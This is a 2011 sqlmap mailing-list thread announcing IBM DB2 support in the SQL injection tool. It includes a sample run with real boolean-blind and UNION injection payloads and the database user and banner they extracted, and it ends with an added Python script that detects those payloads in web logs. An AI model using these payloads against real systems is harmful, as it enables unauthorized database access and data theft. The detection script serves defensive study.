The generic tests are always tested for, regardless of the DBMS
identified or the --dbms switch provided.

Bernardo


2011/8/10 Andres Tarascó Acuña <atara...@gmail.com>:
> Hi,
> Is the "--dbms=db2" flag still unsupported? I have tried it, however
> the checked payloads were:
> [20:43:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [20:44:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> [20:44:13] [INFO] testing 'Generic UNION query with Microsoft Access (%00)
> comment (NULL) - 1 to 10 columns'
> I'm not sure if this is currently a bug or just the expected result :?
> Thanks.
> Andres
> 2011/7/6 Bernardo Damele A. G. <bernardo.dam...@gmail.com>
>>
>> Hi,
>>
>> Update on IBM DB2 support: payload for time-based has been added[1]
>> last week as well as support for direct connection (-d switch).
>>
>> [1] https://twitter.com/#!/sqlmap/status/85659702565937152
>>
>>
>> On 25 June 2011 11:04, Bernardo Damele A. G. <bernardo.dam...@gmail.com>
>> wrote:
>> > Hi,
>> >
>> > The long awaited IBM DB2 support has been implemented in sqlmap. The
>> > patch has been provided by Sebastian Bittig of r-tec IT Systeme GmbH
>> > and merged in sqlmap repository after some tweaking by us. It is very
>> > stable for both DB2 8.x and 9.x branches.
>> > The patch includes support to fingerprint and enumerate data on IBM
>> > DB2 via boolean-based blind SQL injection and UNION query SQL
>> > injection. Hopefully, soon someone will come up with a payload for
>> > time-based and error-based techniques too. Support for direct
>> > connection to the DBMS (-d switch) will be implemented soon as well.
>> >
>> > Thank you Sebastian and the rest of the team at r-tec for your patch
>> > and support!
>> >
>> > Sample run against an IBM DB2 9.7 test environment:
>> > --8<--
>> > $ python sqlmap.py -u http://TARGET/page.php?id=1 -f -b --current-user
>> >
>> >    sqlmap/1.0-dev (r4182) - automatic SQL injection and database
>> > takeover tool
>> >    http://sqlmap.sourceforge.net
>> >
>> > [!] legal disclaimer: usage of sqlmap for attacking targets without
>> > prior mutual consent is illegal. It is the end user's responsibility
>> > to obey all applicable local, state and federal laws. Authors assume
>> > no liability and are not responsible for any misuse or damage caused
>> > by this program
>> >
>> > [*] starting at 10:56:21
>> >
>> > [10:56:21] [INFO] using
>> >
>> > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/TARGET/session'
>> > as session file
>> > [10:56:21] [INFO] testing connection to the target url
>> > [10:56:23] [INFO] heuristics detected web page charset 'ascii'
>> > [10:56:23] [INFO] testing if the url is stable, wait a few seconds
>> > [10:56:25] [INFO] url is stable
>> > [10:56:25] [INFO] testing if GET parameter 'id' is dynamic
>> > [10:56:26] [INFO] confirming that GET parameter 'id' is dynamic
>> > [10:56:26] [INFO] GET parameter 'id' is dynamic
>> > [10:56:27] [INFO] heuristic test shows that GET parameter 'id' might
>> > be injectable (possible DBMS: DB2)
>> > [10:56:27] [INFO] testing sql injection on GET parameter 'id'
>> > [10:56:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> > clause'
>> > [10:56:32] [INFO] GET parameter 'id' is 'AND boolean-based blind -
>> > WHERE or HAVING clause' injectable
>> > parsed error message(s) showed that the back-end DBMS could be DB2. Do
>> > you want to skip test payloads specific for other DBMSes? [Y/n]
>> > [10:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> > [10:56:49] [INFO] target url appears to be UNION injectable with 1
>> > columns
>> > [10:56:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) -
>> > 1 to 10 columns' injectable
>> > GET parameter 'id' is vulnerable. Do you want to keep testing the
>> > others? [y/N]
>> > sqlmap identified the following injection points with a total of 21
>> > HTTP(s) requests:
>> > ---
>> > Place: GET
>> > Parameter: id
>> >    Type: boolean-based blind
>> >    Title: AND boolean-based blind - WHERE or HAVING clause
>> >    Payload: id=1' AND 7118=7118 AND 'Skhh'='Skhh
>> >
>> >    Type: UNION query
>> >    Title: Generic UNION query (NULL) - 1 to 10 columns
>> >    Payload: id=1' UNION ALL SELECT
>> >
>> > CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58)
>> > FROM SYSIBM.SYSDUMMY1--  AND 'QrLM'='QrLM
>> > ---
>> >
>> > [10:58:58] [INFO] testing IBM DB2
>> > [10:58:59] [INFO] confirming IBM DB2
>> > [10:59:12] [INFO] the back-end DBMS is IBM DB2
>> > web server operating system: Windows
>> > web application technology: PHP 5.3.5, Apache 2.2.17
>> > back-end DBMS: active fingerprint: IBM DB2 9.7
>> >               html error message fingerprint: DB2
>> > [10:59:12] [INFO] fetching banner
>> > banner:    'DB2 v9.7.400.501'
>> >
>> > [10:59:13] [INFO] fetching current user
>> > current user:    'TEST'
>> > --8<--
>> >
>> > Bernardo
>> >
>> >
>> > --
>> > Bernardo Damele A. G.
>> >
>> > E-mail / Jabber: bernardo.damele (at) gmail.com
>> > Mobile: +447788962949 (UK 07788962949)
>> > PGP Key ID: Unavailable
>> >
>>
>>
>>
>> ------------------------------------------------------------------------------
>> All of the data generated in your IT infrastructure is seriously valuable.
>> Why? It contains a definitive record of application performance, security
>> threats, fraudulent activity, and more. Splunk takes this data and makes
>> sense of it. IT sense. And common sense.
>> http://p.sf.net/sfu/splunk-d2d-c2
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



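As an added example (not code from the thread or from sqlmap itself), here is a small defender-side script that scans web-server access-log lines for the two payload shapes visible in the sample run above: the boolean-based blind tautology (`AND 7118=7118 AND 'Skhh'='Skhh`) and the DB2 UNION query built from `CHR()` concatenation against `SYSIBM.SYSDUMMY1`. The log lines are constructed and assume the common combined log format.

```python
import re
from urllib.parse import unquote

# Constructed web-server access-log lines (not taken from the thread); the
# injected query strings mirror the two payload shapes in the sample run above.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Jun/2011:10:56:21 +0100] "GET /page.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [25/Jun/2011:10:56:32 +0100] "GET /page.php?id=1%27%20AND%207118%3D7118'
    '%20AND%20%27Skhh%27%3D%27Skhh HTTP/1.1" 200 512',
    '10.0.0.5 - - [25/Jun/2011:10:56:51 +0100] "GET /page.php?id=1%27%20UNION%20ALL%20SELECT'
    '%20CHR%2858%29%7C%7CCHR%28110%29%20FROM%20SYSIBM.SYSDUMMY1--%20%20AND%20%27QrLM%27%3D%27QrLM'
    ' HTTP/1.1" 200 734',
]

# Ordered detection rules, each matched against the URL-decoded request target.
RULES = [
    # "AND 7118=7118": numeric tautology used by the boolean-based blind test
    ("numeric_tautology", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    # "AND 'Skhh'='Skhh": string tautology that re-closes the injected quote
    ("string_tautology", re.compile(r"\bAND\s+'(\w+)'\s*=\s*'\1\b", re.I)),
    # UNION query selecting from DB2's one-row dummy table
    ("db2_union_sysdummy1",
     re.compile(r"\bUNION\s+ALL\s+SELECT\b.*\bFROM\s+SYSIBM\.SYSDUMMY1\b", re.I)),
    # string assembled from CHR() calls, as in the UNION payload's marker columns
    ("chr_concat_string", re.compile(r"\bCHR\(\d+\)(?:\|\|CHR\(\d+\))+", re.I)),
]

def request_target(line):
    """Return the URL-decoded request target from a combined-format log line."""
    m = re.search(r'"(?:GET|POST|HEAD)\s+(\S+)', line)
    return unquote(m.group(1)) if m else ""

def classify(line):
    """Return the names of all rules that fire on one log line, in RULES order."""
    target = request_target(line)
    return [name for name, pat in RULES if pat.search(target)]

def scan(lines):
    """Map each suspicious line's index to its rule hits; clean lines are omitted."""
    return {i: hits for i, line in enumerate(lines) if (hits := classify(line))}

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits, request_target(SAMPLE_LOG[idx]))
```

Decoding the request target before matching matters: the same payload arrives percent-encoded, so rules applied to the raw log line would miss it.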